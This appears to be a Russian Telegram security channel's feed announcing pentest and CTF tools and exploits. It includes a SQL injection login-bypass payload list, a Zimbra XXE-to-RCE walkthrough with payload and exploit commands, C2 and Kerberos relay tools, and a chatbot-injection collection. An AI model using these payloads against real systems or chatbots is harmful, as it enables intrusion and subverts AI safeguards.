NETRUNNER GROUP
2.97K subscribers
268 photos
32 videos
22 files
164 links
> По вопросам обращаться @TripiniFKYL <
Заместитель - @netrunner_1G
Discord - https://discord.gg/tqmrqRYPW5
Чат - https://xn--r1a.website/+tkuqqLpFQPVhM2Zi
Сайт - https://cybernetrunner.ru (ведется разработка новой платформы)
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
csprecon

Обнаружение новых целевых доменов с помощью политики безопасности содержимого (CSP)

Установка:
go install github.com/edoardottt/csprecon/cmd/csprecon@latest

Примеры запуска:
csprecon -u https://github.com
csprecon -l targets.txt
🔥5👍2❤‍🔥1
Offensive OSINT s04e04 - Open Source Surveillance

Общаясь с нашими подписчики, мы узнали о потребности в годных OSINT гайдах для CTF'еров, для себя любимого)
Поэтому поресерчили на нашли статью о наступательном OSINT'е. Так что пользуйтесь в своё удовольствие этими инструментами)

Наблюдение из открытых источников выводит сбор разведданных и кибершпионаж на совершенно новый уровень. Он может использоваться для обеспечения безопасности наступательных операций, но с другой стороны может быть полезен в OSINT и расследованиях правоохранительных органов. Благодаря 18 модулям, OSS может показать вид города в реальном времени с различных камер, постов в социальных сетях или устройств, подключенных к Интернету. Прочитайте статью, чтобы ознакомиться с инструментом и потенциальными случаями, в которых он может помочь.

Подробнее
🔥4👍31
Пробуем Heroinn легально

Heroinn - это Кроссплатформенная платформа C2/post-exploitation framework, реализованная на Rust.

Функции:
1. GUI
2. Интерактивная оболочка PTY
3. Сбор системной информации
4. Поддержка файлового менеджера с возобновлением прерванной передачи и большого файла
5. Поддержка Win10+(Windows Server 2019+) & Linux & BSD & OSX
6. Множество протоколов связи (TCP & HTTP & надежный UDP)

#tools

Github
👍7❤‍🔥2
Старт бесплатного обучения модулю script-kiddie

Когда?
🔔7 февраля в 17:00 (МСК)

Что в программе?
🟠Обучение работы в kali linux
🟠Обучение основам сетей
🟠Системное администрирование сетевых сервисов под Linux (nginx, ftp, ssh)
🟠Программирование веб-приложений на языке программирования PHP

Преподаватель:
🎙Дон @dongani
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥93👍2
😘
16❤‍🔥5🤔4👍2
Forwarded from Похек
CVE-2022-21587
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild

CVE-2022-21587
может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.

Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.

P.S. POC
SSTImap

Это программное обеспечение для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей Code Injection и Server-Side Template Injection и эксплуатировать их, предоставляя доступ к самой операционной системе.
Этот инструмент был разработан для использования в качестве интерактивного средства тестирования на проникновение для обнаружения и эксплуатации SSTI, что позволяет осуществлять более продвинутую эксплуатацию.

#tools

Github
NetRunner 👾
👍6
500+ участников в нашем Discord сервере 🥳
Спасибо что вы с нами 🥹

P.S. Быстренько к Дону на лекции пошли)
👍82
This media is not supported in your browser
VIEW IN TELEGRAM
Как вы помните, у нас есть CTF команда RHTeam, так вот для них сделали стикеры, разбирайте 😎
🔥7
Украл мем где то в ВК 😁
❤‍🔥18
Настроение у меня сегодня поделать посты, и есть у меня одна безумная идейка, сделать сложный и длинный CTF, для больших городов.
Пока в список входит:
Москва
Питер
Новосибирск
Да, что бы решить CTF, нужно выйти на улицу) 😉
Напиши свой город в комментариях, если будет много комментариев с одного города, то и там организуем)
А ниже проголосуй, за или против, если наберется 200 за, то мы начнём делать ❤️
❤‍🔥6🔥2
Хочешь интересную CTF?
Final Results
93%
Я за ❤️
7%
Против 😐
🔥2
Apache-Struts-v4
CVE-2013-2251
CVE-2017-5638
CVE-2017-9805
CVE-2018-11776
CVE-2019-0230

Скрипт содержит 5 различных уязвимостей, эксплуатирующие RCE в Apache Struts. На данный момент он содержит только возможность создания PHP shell.

#CVE #POC
👍71
ADRT

Инструмент, используемый сетевыми администраторами и аналитиками безопасности для извлечения информации из Active Directory, такой как: Пользователи, группы, администраторы, контроллеры домена, пароль Never Expire, все компьютеры, все серверы, GPO, последний вход в систему, отключенные пользователи, группы участников и инвентаризация.

#ActiveDirectory #Windows
👍51
https://vk.com/cyberhackerss приглашает студентов-спикеров и слушателей посетить встречу-конференцию «Networks and RadioHack Meet-up»!

🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://xn--r1a.website/kibhack_bot

«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.

Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.

Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://xn--r1a.website/kibhack_bot.

Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
3
Forwarded from Похек
SQL injection auth bypass list

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

#sqli
🔥152😍2❤‍🔥1👍1
udon

Инструмент на Go для поиска поддоменов на основе Google Analytics ID

Установка:
go install github.com/dhn/udon@latest

Использование:
udon -silent -json -s UA-ID | jq -c

#tools
🔥7❤‍🔥1
💬🤖💉 Chatbot Injections & Exploits🐱💻

Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.

#chatgpt
🔥4👍3
Forwarded from Похек
XXE to RCE Zimbra CVE-2019-9670

Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)

Payload XXE:
 xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Ниже приведу парочку примеров, как эксплуатировать эту вулну.
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit

Arambiz - эксплойт на Python3:
 clone https://github.com/oppsec/arbimz.git
pip3 install -r requirements.txt
python3 main.py --url https://example.com/

Zaber - эксплойт на Go:
 install github.com/oppsec/zaber@latest
zaber -u https://example.com
Если у вас не находит бинарь, то пропишите абсолютный путь.
 -u https://example.com
А после работ не забудьте добавить $HOME/go/bin/ в свой PATH 😉


Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.

Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
KrbRelayUp

Оболочка для Rubeus и KrbRelay для упрощения следующих атак:
1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3. Kerberos relay to LDAP
4. Добавление привилегий RBCD и получение Service Ticket (ST) на локальной машине
5. Используя указанный ST для аутентификации в локальном Service Manager и создания нового процесса, как NT/SYSTEM
6. Kerberos relay to ADCS (HTTP)
7. Генерирование запроса на сертификат от имени учетной записи локальной машины, отправка запроса в ADCS Web Enrollment для получения сертификата для учетной записи локальной машины.
8. Генерирование нового KeyCredential и добавление его к атрибуту msDS-KeyCredentialLink учетной записи локальной машины
9. Использование полученного сертификата и KeyCredential для получения TGT для учетной записи локальной машины через PKInit
10. Использование TGT для получения Service Ticket (ST) на локальной машине через S4U2Self и TGSSUB

#tools
❤‍🔥10👍1